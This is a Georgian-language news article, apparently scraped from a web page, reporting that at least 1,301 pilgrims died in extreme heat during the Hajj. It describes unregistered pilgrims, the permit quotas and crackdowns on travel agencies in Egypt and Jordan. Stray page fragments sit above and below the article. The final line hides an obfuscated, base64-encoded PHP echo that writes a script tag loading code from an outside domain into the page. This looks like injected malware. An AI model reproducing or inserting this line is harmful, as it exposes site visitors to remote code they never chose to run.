celsiusi
ავერსი საქკაბელი

 საუდის არაბეთში ჰაჯის დროს, სულ მცირე, 1301 ადამიანი დაიღუპა, რომლებიც სიცხიან ამინდში შორ მანძილზე თავშესაფრის გარეშე გადაადგილდებოდნენ. ინფორმაციას „ბიბისი“ ავრცელებს.

ჰაჯის დროს ტემპერატურა წელს 50 გრადუს ცელსიუსს აღემატებოდა. როგორც მედია წერს, დაღუპულთა სამ მეოთხედზე მეტს არ ჰქონდა ჰაჯიზე ყოფნის ოფიციალური ნებართვა და ისინი მზის სხივების ქვეშ გადაადგილდებოდნენ. ამასთან, დაღუპულთა ნაწილი ხანდაზმულები და ქრონიკული დაავადებების მქონე პირები იყვნენ.

როგორც „ბიბისი“ აღნიშნავს, საუდის არაბეთს აკრიტიკებენ იმის გამო, რომ მეტი ძალისხმევა არ გაიღეს ჰაჯის უფრო უსაფრთხოდ ჩატარებისთვის, განსაკუთრებით დაურეგისტრირებელ მომლოცველებთან დაკავშირებით, რომელთაც არ აქვთ წვდომა ისეთ ობიექტებზე, როგორებიცაა კონდიცირებული კარვები და ჰაჯის ოფიციალური ტრანსპორტი.

მექაში სალოცავად წასვლა, ანუ ჰაჯის შესრულება, მუსლიმთა ერთ-ერთი უწმინდესი მოვალეობაა. წელს ჰაჯიში მონაწილეობა დაახლოებით 1,8 მილიონმა ადამიანმა მიიღო.

ჰაჯის შესრულების ნებართვები ქვეყნებს შორის კვოტების სისტემით ნაწილდება და ის ფიზიკურ პირებზე ლატარიის გზით ნაწილდება.

ეგვიპტის პრემიერ-მინისტრმა ლიცენზია 16 ტურისტულ კომპანიას ჩამოართვა მექაში არალეგალური მომლოცველების დაშვების გამო. ასევე, იორდანიაში განაცხადეს, რომ დააკავეს რამდენიმე ტურისტული აგენტი, რომლებიც ხელს უწყობდნენ მუსლიმი მომლოცველების არაოფიციალურ მოგზაურობას მექაში. დაკავების შემთხვევაში, არაოფიციალურად მყოფ პირებს დაპატიმრება და დეპორტაცია ემუქრებათ.

144
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");